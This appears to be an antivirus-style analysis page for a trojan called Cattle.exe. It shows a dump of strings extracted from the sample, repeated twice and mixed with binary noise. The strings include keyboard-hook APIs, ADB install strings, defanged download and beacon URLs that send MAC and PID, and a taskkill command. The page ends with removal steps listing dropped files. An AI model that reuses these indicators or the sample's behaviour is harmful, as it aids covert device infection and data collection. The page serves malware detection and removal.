f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
KEYS_MENU
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
code %d bits %d->%d
gen_codes: max_code %d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
-.zip
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-1.1.3
1.1.3
%s%s%s
Correct password required
1.2.8
zerr=%d Z_STREAM_END=%d total_out=%lu
entryCount=%d
x-xx-xxxx-xxxx
XXXXXXXXXXX
%d(lo-client:%s%d)
%d(%s)
%s%s/
cannot open '%s': %s
cannot stat '%s': %s
skipping special file '%s'
cannot read '%s': %s
error seeking in file '%s'
could not allocate buffer for '%s'
error reading from file: '%s'
file '%s' is not a valid zip file
AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
failed to copy '%s' to '%s': %s
%spush: %s -> %s
%d file%s pushed. %d file%s skipped.
error: %s
%s/%s
hXXp://app.miaoxia8.com/driver/
DPInst.exe
\DPInst.exe
xm32.zip
xm64.zip
ua32.zip
ua64.zip
:%d: %s
0xX,
can't find '%s' to install
can't install '%s' because it's not a file
shell:am start -n %s
shell:input keyevent 3
/data/local/tmp/%s
/sdcard/tmp/%s
--key
host-serial:%s:%s
%s:%s
ANDROID_ADB_SERVER_PORT
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
Zip EOCD: expected >= %d bytes, found %d
EOCD(%d) comment(%d) exceeds len (%d)
Archive spanning not supported
protocol fault (status x x x x?!)
host:transport:%s
transport-usb
transport-local
transport-any
host:%s
TscServer.exe
error:%d
Windows
PID:%s
127.0.0.1
taskkill /f /im %s
%s\adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
?MAC=%s&PID=%s
adb.ini
APPURL
/TscServer.exe
ShellRun%s/%s
%s\%s
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
InternalGetTcpTable2
transport
XXXXXX
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
c:\app\Call.pdb
.PAVCFileException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCInternetException@@
.?AVCHttpFile@@
.PAVCOleException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
%Documents and Settings%\%current user%\Application Data\Cattle.exe
10/13/2009
000000000000
Keyboard
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
1000_12187
PeekNamedPipe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
Reporte_Dispatch
RegQueryInfoKeyA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteA
UrlUnescapeA
GetAsyncKeyState
MapVirtualKeyA
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
GetKeyNameTextA
MapVirtualKeyExA
GetKeyboardLayout
UnhookWindowsHookEx
GetKeyboardState
InternetOpenUrlA
HttpQueryInfoA
InternetCanonicalizeUrlA
InternetCrackUrlA
.text
`.rdata
@.data
.rsrc
@.reloc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
adbWinpi.dll
ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
gdiplus.dll
IMM32.dll
IPHLPAPI.DLL
MSIMG32.dll
OLEACC.dll
OLEAUT32.dll
SETUPAPI.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
@WININET.DLL
accKeyboardShortcut
hhctrl.ocx
dwmapi.dll
UxTheme.dll
USER32.DLL
NRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
manufacturer:%s
product name:%s
version:%s
serial number:%s
last wake-up event:%s
uuid:x-xx-xxxx-xxxx
sku number:%s
family:%s
Cattle.exe_2188_rwx_00401000_001FA000:
t.hP$S
t.hd*S
tWSShW
tl9_ tgSSh
u$SShe
@ SSHPWj
j%XtL9E
tAHt.HHt
t'SShl
<SShG
SSSSh`
FTCP
FtPW
SSh@B
PhL%S
CNotSupportedException
CHttpFile
hXXp://
kernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
RegOpenKeyTransactedA
Advapi32.dll
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
RegDeleteKeyExA
user32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
MFCLink_UrlPrefix
MFCLink_Url
Shell32.dll
%s:%x:%x:%x:%x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
&%d %s
Hex={X,X,X}f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
ShowCmd
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
%sPane-%d%x
%sPane-%d
%c%d%c%s
RGB(%d, %d, %d)
%sBasePane-%d%x
%sBasePane-%d
windows
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
KEYS_MENU
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
code %d bits %d->%d
gen_codes: max_code %d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
-.zip
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-1.1.3
1.1.3
%s%s%s
Correct password required
1.2.8
zerr=%d Z_STREAM_END=%d total_out=%lu
entryCount=%d
x-xx-xxxx-xxxx
XXXXXXXXXXX
%d(lo-client:%s%d)
%d(%s)
%s%s/
cannot open '%s': %s
cannot stat '%s': %s
skipping special file '%s'
cannot read '%s': %s
error seeking in file '%s'
could not allocate buffer for '%s'
error reading from file: '%s'
file '%s' is not a valid zip file
AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
failed to copy '%s' to '%s': %s
%spush: %s -> %s
%d file%s pushed. %d file%s skipped.
error: %s
%s/%s
hXXp://app.miaoxia8.com/driver/
DPInst.exe
\DPInst.exe
xm32.zip
xm64.zip
ua32.zip
ua64.zip
:%d: %s
0xX,
can't find '%s' to install
can't install '%s' because it's not a file
shell:am start -n %s
shell:input keyevent 3
/data/local/tmp/%s
/sdcard/tmp/%s
--key
host-serial:%s:%s
%s:%s
ANDROID_ADB_SERVER_PORT
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
Zip EOCD: expected >= %d bytes, found %d
EOCD(%d) comment(%d) exceeds len (%d)
Archive spanning not supported
protocol fault (status x x x x?!)
host:transport:%s
transport-usb
transport-local
transport-any
host:%s
TscServer.exe
error:%d
Windows
PID:%s
127.0.0.1
taskkill /f /im %s
%s\adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
?MAC=%s&PID=%s
adb.ini
APPURL
/TscServer.exe
ShellRun%s/%s
%s\%s
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
InternalGetTcpTable2
transport
XXXXXX
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}%s\Connection
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}c:\app\Call.pdb
.PAVCFileException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCInternetException@@
.?AVCHttpFile@@
.PAVCOleException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
%Documents and Settings%\%current user%\Application Data\Cattle.exe
10/13/2009
000000000000
Keyboard
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
1000_12187
PeekNamedPipe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
Reporte_Dispatch
RegQueryInfoKeyA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteA
UrlUnescapeA
GetAsyncKeyState
MapVirtualKeyA
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
GetKeyNameTextA
MapVirtualKeyExA
GetKeyboardLayout
UnhookWindowsHookEx
GetKeyboardState
InternetOpenUrlA
HttpQueryInfoA
InternetCanonicalizeUrlA
InternetCrackUrlA
2;%SK
`T##.#.WA3##-3&<<
.QICN,--6[?-`=#10$ F . t33?-W7P53R-- 33 #51;. #13 5;-[3-M?-3#6#M->-a051?-#3 ..#
###$-1?
- (;%(10
$,0(,$($,000 ,$ $
.text
`.rdata
@.data
.rsrc
@.reloc
G.At#_
.zCN,
^&- (;%(|
@WININET.DLL
accKeyboardShortcut
hhctrl.ocx
KERNEL32.DLL
dwmapi.dll
UxTheme.dll
USER32.DLL
NRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
manufacturer:%s
product name:%s
version:%s
serial number:%s
last wake-up event:%s
uuid:x-xx-xxxx-xxxx
sku number:%s
family:%s
Cattle.exe_2188_rwx_10018000_0002F000:
%F*>#
kN]%X
: L.xx_
Tf.rh
%CTyN(
.Qzpmz
Uexe
.Ru-]
BuFtp>
.QZ`s
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ndis500.exe:3740
appmon.exe:2132
MiniIE.exe:1256
ndsqp.exe:3824
audiodg.exe:2216
yum.exe:3540
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\gYhxYl3.sys (22 bytes)
%System%\vrPCEc2 (1830 bytes)
%Documents and Settings%\%current user%\Application Data\adbWinpi.dll (304 bytes)
%Documents and Settings%\%current user%\Application Data\Cattle.exe (3726 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinApi.dll (96 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinUsbApi.dll (60 bytes)
%Documents and Settings%\%current user%\Application Data\TscServer.exe (1653 bytes)
%System%\jBkaBo6.sys (22 bytes)
%System%\yuSFHf5 (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\262792\svchost.exe (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\26279\svchost.exe (1629 bytes)
%System%\clk.ini (103 bytes)
%WinDir%\run.bat (196 bytes)
%System%\cBLK.dll (2145 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.